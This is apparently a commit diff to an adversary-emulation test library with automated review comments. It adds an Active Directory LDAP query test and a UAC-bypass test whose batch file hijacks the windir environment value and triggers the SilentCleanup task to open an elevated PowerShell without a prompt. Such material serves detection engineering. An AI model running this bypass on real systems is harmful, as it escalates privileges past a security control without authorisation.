+ - windows
+ input_arguments:
+ domain:
+ description: Domain FQDN
+ type: String
+ default: contoso.com
+ uac_prop:
+ description: UAC Property to search
+ type: String
+ default: 524288
+ dependencies:
+ - description: |
+ PowerShell ActiveDirectory Module must be installed
+ prereq_command: |
+ Try {
+ Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+ exit 0
+ }
+ Catch {
+ exit 1
+ }
+ get_prereq_command: |
+ if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+ Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+ } else {
+ Install-WindowsFeature RSAT-AD-PowerShell
+ }
+ executor:
+ name: powershell
+ elevation_required: false
+ command: |
+ Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
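Review bot: The description states the test must run under a domain user, but the only `prereq_command` checks that the ActiveDirectory module imports, so on a non-domain-joined host or under a local account the `Get-ADObject` call fails at execution with a server/authentication error rather than a clear prerequisite failure. A second `dependencies` entry along the lines of `prereq_command: if ($env:USERDNSDOMAIN) {exit 0} else {exit 1}` would surface that condition up front. `uac_prop` is declared `type: String` although its value is numeric, and the capitalised `String` sits alongside lowercase `string`/`path` in T1027.yaml in this same commit; if the schema accepts both spellings, one should be used consistently. The index.yaml copy of this test carries the same declarations.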
diff --git a/atomics/T1548.002/T1548.002.md b/atomics/T1548.002/T1548.002.md
index 98064122..597dc756 100644
--- a/atomics/T1548.002/T1548.002.md
+++ b/atomics/T1548.002/T1548.002.md
@@ -28,6 +28,8 @@ Another bypass is possible through some lateral movement techniques if credentia
- [Atomic Test #8 - Disable UAC using reg.exe](#atomic-test-8---disable-uac-using-regexe)
+- [Atomic Test #9 - Bypass UAC using SilentCleanup task](#atomic-test-9---bypass-uac-using-silentcleanup-task)
+
@@ -314,4 +316,43 @@ reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v En
+
+
+
+## Atomic Test #9 - Bypass UAC using SilentCleanup task
+Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+For example, we can set the windir registry kye to: "cmd /k REM "
+
+And forcefully run SilentCleanup task:
+
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| file_path | Path to the bat file | String | PathToAtomicsFolder\T1548.002\src\T1548.002.bat|
+
+
+#### Attack Commands: Run with `command_prompt`!
+
+
+```cmd
+#{file_path}
+```
+
+
+
+
+
+
diff --git a/atomics/T1548.002/T1548.002.yaml b/atomics/T1548.002/T1548.002.yaml
index 5186a236..619b5f6a 100644
--- a/atomics/T1548.002/T1548.002.yaml
+++ b/atomics/T1548.002/T1548.002.yaml
@@ -162,3 +162,29 @@ atomic_tests:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
name: command_prompt
elevation_required: true
+- name: Bypass UAC using SilentCleanup task
+ auto_generated_guid: 28104f8a-4ff1-4582-bcf6-699dce156608
+ description: |
+ Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
+
+ There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC (even highest level).
+
+ For example, we can set the windir registry kye to: "cmd /k REM "
+
+ And forcefully run SilentCleanup task:
+
+ schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
+
+ REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
+ supported_platforms:
+ - windows
+ input_arguments:
+ file_path:
+ description: Path to the bat file
+ type: String
+ default: PathToAtomicsFolder\T1548.002\src\T1548.002.bat
+ executor:
+ command: |
+ #{file_path}
+ name: command_prompt
+ elevation_required: false
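Review bot: The description says the `windir` value is set to `"cmd /k REM "`, but the bat file added in this commit (atomics/T1548.002/src/T1548.002.bat) writes `cmd /c start powershell&REM `, so the YAML documents a different payload than the one that actually runs; the description should match the script, and `kye` on that line is a typo for `key`. The test declares no `cleanup_command`, so if the bat is interrupted before its final `reg delete` the `HKCU\Environment\windir` value persists on the host; `cleanup_command: reg delete "HKCU\Environment" /v "windir" /F >nul 2>&1` makes cleanup independent of the script. There is also no dependency asserting that `#{file_path}` exists, so a missing bat yields a command-not-found error instead of a prerequisite failure; a `dependencies` entry with `prereq_command: if (Test-Path "#{file_path}") {exit 0} else {exit 1}` would cover that. For the detection-engineering audience the description could also list the observable artifacts the script produces (the write to `HKCU\Environment\windir` followed by a manual start of the SilentCleanup task). The same text is repeated in the two index.yaml hunks and in T1548.002.md.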
diff --git a/atomics/T1548.002/src/T1548.002.bat b/atomics/T1548.002/src/T1548.002.bat
new file mode 100644
index 00000000..d873b527
--- /dev/null
+++ b/atomics/T1548.002/src/T1548.002.bat
@@ -0,0 +1,8 @@
+@echo off
+mode 18,1
+color FE
+reg add "HKCU\Environment" /v "windir" /d "cmd /c start powershell&REM " >nul
+timeout /t 2 >nul
+schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
+timeout /t 3 >nul
+reg delete "HKCU\Environment" /v "windir" /F
\ No newline at end of file
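Review bot: The registry write, task launch and registry delete are sequenced only by fixed `timeout /t 2` and `timeout /t 3` sleeps, so on a slow or mitigated host the script gives no indication whether the elevated process actually started, and a tester cannot distinguish a patched system from a timing miss; the script should at least report when the task did not behave as expected. `mode 18,1` and `color FE` only resize and recolour the operator's console and have no bearing on the technique, so they are better left out of an atomic. The window launched by `start powershell` is never closed, leaving a running process behind that neither this script nor the YAML cleans up; the test description should say so. The file also lacks a trailing newline.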
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 7d1c8c5d..e78c5f95 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -704,3 +704,7 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
788e0019-a483-45da-bcfe-96353d46820f
58004e22-022c-4c51-b4a8-2b85ac5c596b
0b2f9520-a17a-4671-9dba-3bd034099fff
+28104f8a-4ff1-4582-bcf6-699dce156608
+46f8dbe9-22a5-4770-8513-66119c5be63b
+c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+126f71af-e1c9-405c-94ef-26a47b16c102